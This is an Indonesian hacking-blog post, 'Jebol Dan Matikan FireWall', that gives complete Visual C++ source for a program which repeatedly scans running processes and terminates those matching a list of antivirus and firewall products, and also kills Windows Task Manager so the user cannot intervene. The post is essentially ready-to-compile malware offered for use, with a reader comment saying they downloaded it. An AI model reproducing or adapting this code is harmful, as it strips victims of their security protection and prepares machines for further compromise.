r00t »» »» Jebol Dan Matikan FireWall

Jebol Dan Matikan FireWall

by LOLids artich | | | 2 komentar »



Kali ini saya mo tulis sedikit mengenai membunuh Firewall dgn VC++ (Ver 6), file program ini dibagi menjadi 3 bagian yaitu DeadWall.cpp, StdAfx.cpp dan StdAfx.h (header), sebelumnya saya jelaskan singkat mengenai prosedurnya.

Disini ada semua nama-nama file thread dari semua Firewall dan Antivirus terkenal, saya masukan dalam array sebanyak 58 (bisa anda modif kalau ada thread Firewall baru)

Untuk membunuh Firewall atau Antivirus tidak bisa langsung dibunuh begitu saja dengan menghapus master filenya, akan tetapi harus mematikan thread prosesnya terlebih dahulu, untuk itu disini dibuat 2 proses yaitu Bunuh_Firewall_NT dan Bunuh_Firewall_98, Bunuh_Firewall_NT juga berlaku untuk 2000 dan XP.

Dengan sedikit modifikasi

program ini juga bisa mematikan Trojan aktif.

Compile dengan VC++ 6 dengan mode 32 bit..
E-Mail atau PM untuk Modify & Pertanyaan..

Selamat menikmati..

Copy Paste text berikut dan save dalam StdAfx.cpp


/*************************/
#include "stdafx.h"
/*************************/

Ini dalam StdAfx.h
/*************************/
#if !defined(AFX_STDAFX_H__A9DB83DB_A9FD_11D0_BFD1_444553540000__INCLUDED_)
#define AFX_STDAFX_H__A9DB83DB_A9FD_11D0_BFD1_444553540000__INCLUDED_
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
#define WIN32_LEAN_AND_MEAN
#include
#endif
/*************************/

Dan ini master programnya dalam DeadWall.cpp
/*************************/
/* Copyright (c) DeathBrain 2002 */
/* Hormati Lisensi */
/* E-Mail atau PM untuk modifikasi thx */

#include "stdafx.h"
#include

char *Kode_Firewall[58]={
"ANTIVIR","WEBSCANX","SAFEWEB","ICMON",
"CFINET","CFINET32","AVP.EXE","LOCKDOWN2000",
"AVP32","ZONEALARM","ALERTSVC","AMON.EXE",
"AVPCC.EXE","AVPM.EXE","ESAFE.EXE","PCCIOMON",
"PCCMAIN","POP3TRAP","WEBTRAP","AVCONSOL",
"AVSYNMGR","VSHWIN32","VSSTAT","NAVAPW32",
"NAVW32","NMAIN","LUALL","LUCOMSERVER",
"IAMAPP","ATRACK","MCAFEE","FRW.EXE","IAMSERV.EXE",
"NSCHED32","PCFWALLICON","SCAN32","TDS2-98",
"TDS2-NT","VETTRAY","VSECOMR","NISSERV",
"RESCUE32","SYMPROXYSVC","NISUM","NAVAPSVC",
"NAVLU32","NAVRUNR","NAVWNT","PVIEW95",
"F-STOPW","F-PROT95","PCCWIN98","IOMON98",
"FP-WIN","NVC95","NORTON",};

void Bunuh_Firewall_NT();
void Bunuh_Firewall_98();

DWORD WINAPI Bunuh_Proses_Thread( LPVOID );
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)

{
DWORD t;
HANDLE hAV = CreateThread( NULL, 0, Bunuh_Proses_Thread, 0, 0, &t);
WaitForSingleObject( hAV, INFINITE);

MessageBox(0,"e","d",MB_OK);return 0;}

DWORD WINAPI Bunuh_Proses_Thread( LPVOID )
{DWORD pd;
while(TRUE){
Sleep(1000);
if((int)GetVersion() < 0 ) Bunuh_Firewall_98();else Bunuh_Firewall_NT();
HWND hw=FindWindow("#32770","Windows Task Manager");
if(hw!=NULL){
GetWindowThreadProcessId(hw,&pd);
TerminateProcess(OpenProcess(PROCESS_ALL_ACCESS,FALSE,pd ),0);}}
return 0;}

void Bunuh_Firewall_NT()
{
HINSTANCE hLib = LoadLibraryA("PSAPI.DLL");
if (!hLib) return ;
BOOL (WINAPI *Enumerasi_Proses)( DWORD *, DWORD cb, DWORD * );
BOOL (WINAPI *Enumerasi_Modul_Proses)( HANDLE, HMODULE *, DWORD, LPDWORD );
DWORD (WINAPI *Ambil_Modul_Filename)( HANDLE, HMODULE, LPTSTR, DWORD );
Enumerasi_Proses = (BOOL(WINAPI *)(DWORD *,DWORD,DWORD*)) GetProcAddress( hLib, "EnumProcesses" ) ;
Enumerasi_Modul_Proses = (BOOL(WINAPI *)(HANDLE, HMODULE *, DWORD, LPDWORD)) GetProcAddress( hLib, "EnumProcessModules" ) ;
Ambil_Modul_Filename = (DWORD (WINAPI *)(HANDLE, HMODULE, LPTSTR, DWORD )) GetProcAddress( hLib, "GetModuleFileNameExA" ) ;
if( Enumerasi_Proses == NULL || Enumerasi_Modul_Proses == NULL || Ambil_Modul_Filename == NULL )
{FreeLibrary(hLib);return;}

DWORD *Proses_ID = new DWORD[500];
if(Proses_ID==NULL) return;
DWORD dwSize;
if (!Enumerasi_Proses(Proses_ID, 500*sizeof(DWORD), &dwSize))
{delete [] Proses_ID;
FreeLibrary(hLib);return ;}

HANDLE hProcess;
HMODULE hModule;
DWORD dwSize2;
char Nama_File[MAX_PATH];
int nIndex = 0;
dwSize = dwSize / sizeof(DWORD);
for (int i=0; i< (int)dwSize;i++)
{hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, Proses_ID[i]);
if (hProcess)
{if (Enumerasi_Modul_Proses(hProcess, &hModule, sizeof(hModule), &dwSize2))
{if (Ambil_Modul_Filename(hProcess, hModule, Nama_File, sizeof(Nama_File))){
CharUpperBuff(Nama_File,strlen(Nama_File));
for(int i=0;i < 56; i++)
if(strstr(Nama_File,Kode_Firewall[i])!=0)
TerminateProcess(hProcess,0);}}}
CloseHandle(hProcess);}
delete [] Proses_ID;
FreeLibrary(hLib);
}

void Bunuh_Firewall_98()
{
HANDLE Prosedur_SnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(Prosedur_SnapShot == INVALID_HANDLE_VALUE)
{return;}
PROCESSENTRY32 Proses_Masuk;
HANDLE pr;
Proses_Masuk.dwSize = sizeof(PROCESSENTRY32);
BOOL F = Process32First( Prosedur_SnapShot, &Proses_Masuk );
while (F)
{for(int i=0;i< 56;i++)
if(strstr(Proses_Masuk.szExeFile,Kode_Firewall[i])!=0){
pr=OpenProcess(PROCESS_ALL_ACCESS,FALSE,Proses_Masuk.th32ProcessID );
if(pr!=NULL) TerminateProcess(pr,0);}
Proses_Masuk.dwSize = sizeof(PROCESSENTRY32);
F = Process32Next( Prosedur_SnapShot, &Proses_Masuk );}
CloseHandle(Prosedur_SnapShot);
}

/*************************/


Nb:- simpan semua codenya-nya terpisah di notepad.
Semoga Bermanfaat & goodLuck ;) jika belum berhasil "Meng-Hack mmg engga' semudah pikiran kita, tetep mencoba dan kalo berhasil jangan disalah gunakan yo... ;).

support: hacking forum.






Article information: Description: Jebol Dan Matikan FireWall Rating: 4.5 - Reviewer: LOLids artich - ItemReviewed: Jebol Dan Matikan FireWall


Related Tips, Tricks and Tutorials :



2 komentar Post :
Jebol Dan Matikan FireWall


NOTE:
Follow me ON Facebook , Twitter or

Blog ini adalah Blog DoFollow dengan PageRank Free PageRank Checker, sobat akan mendapatkan Backlink untuk BLOG anda dengan berkomentar di Blog ini. Jangan ada komentar Spam, Please!!.

"Jika Menemukan LINK yg Tidak bisa di akses pada BLOG ini!, silahkan beritahu kepada kami melalui Komentar, Form, etc . sesegera mungkin kami akan memperbaikinya. Terimakasih"




  1. bisnis online ►► [ reply ] [ Jump to TOP ] ► Sat Sep 05, 05:06:00 pm 2009  

    thanks bro, kodenya langsung di unduh

  2. Anonymous ►► [ reply ] [ Jump to TOP ] ► Sat Nov 12, 08:32:00 am 2011  

    I agree completely!

Post a Comment

Next Prev Home